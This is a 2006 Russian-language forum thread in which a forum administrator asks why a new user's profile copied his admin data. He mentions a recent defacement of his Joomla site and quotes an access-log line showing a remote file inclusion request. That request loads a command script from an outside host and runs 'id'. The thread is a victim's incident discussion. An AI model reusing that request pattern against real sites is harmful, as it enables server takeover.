Strict Standards: Resource ID#18 used as offset, casting to integer (18) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#23 used as offset, casting to integer (23) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#25 used as offset, casting to integer (25) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#26 used as offset, casting to integer (26) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Новый пользователь украл данные из профиля администратора в свой профиль
ТвойWeb ТвойWeb
Качественный Европейский хостинг
 Форум для чайников
 Чат на форуме      Помощь      Поиск      Пользователи


 Страниц (1): [1]   

> Без описания
Поиск в теме | Версия для печати
SysteM
Отправлено: 18 Ноября, 2006 - 04:40:48
Post Id



Newbie


Покинул форум
Сообщений всего: 40
Дата рег-ции: Янв. 2006  

Карма 0




 На днях на моем форуме появился очередной новый пользователь, и я был шокирован, когда увидел, что в его профиле значится вся информация, которая прописана в моем, то есть админском профиле. Например, дата регистрации - 10.05.05, а не 16.11.06, также прописан мой день рождения, моя подпись, но главное - мое количество постов (682), и распределение этих постов в процентах по разделам форума. Разве что админских прав у пользователя не было. Как это можно объяснить? Была ли это попытка украсть у меня мой профиль с админскими правами? Или просто форум сглючил?

Пользователя я на всякий случай удалил. Форум - FullMods 0.1.4
 
 Top
TvoyWeb Администратор
Отправлено: 18 Ноября, 2006 - 09:31:15
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52




 SysteM
Интересноа вещь..... я подумаю как такое могло случиться.
 
 Top
Валерий Администратор
Отправлено: 18 Ноября, 2006 - 10:10:52
Post Id



Админ-3


Покинул форум
Сообщений всего: 2676
Дата рег-ции: Янв. 2005  
Откуда: Беларусь

Карма 16




 SysteM
Ты поспешил удалить этого пользователя. Нужно было просто заблокировать.
Потом посмотреть его посты. ты ведь самого главного не увидел - что он писал.
Потом - нужно было открыть папку юзеров и там всю инфу глянуть. тот же пароль сравнить с твоим.

А ты сам ничего не перекачивал никуда?
Мне кажется, это не кто-то регился, а просто твой дубль появился некоим образом.
 
 Top
SysteM
Отправлено: 18 Ноября, 2006 - 13:28:55
Post Id



Newbie


Покинул форум
Сообщений всего: 40
Дата рег-ции: Янв. 2006  

Карма 0




 Пользователь за полтора дня ничего не написал, да и не похоже на простую копию моего профиля, т.к. сам я точно ничего не перекачивал или копировал, и у пользователя был ник и регистрационный е-мейл, отличные от моего.

Пароль на форуме пользователи сами задавать не могут, их генерит сам форум.

Да, удалить может быть и поторопился, но просто буквально позавчера хакнули главную часть этого же сайта, работающую на CMS Joomla - ничего серьезного, просто дефейс главной странички сделали, но все равно теперь я уже настороже.
 
 Top
TvoyWeb Администратор
Отправлено: 18 Ноября, 2006 - 17:01:17
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52
SysteM пишет:
но просто буквально позавчера хакнули главную часть этого же сайта

Возможно в это же время и была сделана копия твоего файла.
 
 Top
SysteM
Отправлено: 18 Ноября, 2006 - 17:49:38
Post Id



Newbie


Покинул форум
Сообщений всего: 40
Дата рег-ции: Янв. 2006  

Карма 0




 Не думаю... Взлом был совершен следующим образом:

CODE:
88.226.0.79 - - [16/Nov/2006:13:32:06 +0300] GET /administrator/components/com_******/********_absolute_path=http://www.nyers.hu/cmd.txt?&list=1&cmd=id


и если заглянуть в файл cmd.txt по ссылке, указанной в куске лога, то не видно никакой связи между форумом ExBB и этим скриптом-взломщиком. Хотя с другой стороны я плохо знаю php, чтобы судить об этом.
 
 Top
Поиск в теме | Версия для печати
Страниц (1): [1]
Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0, скрытых: 0)
« ExBB Full Mods »


Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.
  



Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®
[Script Execution time: 0.0404]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33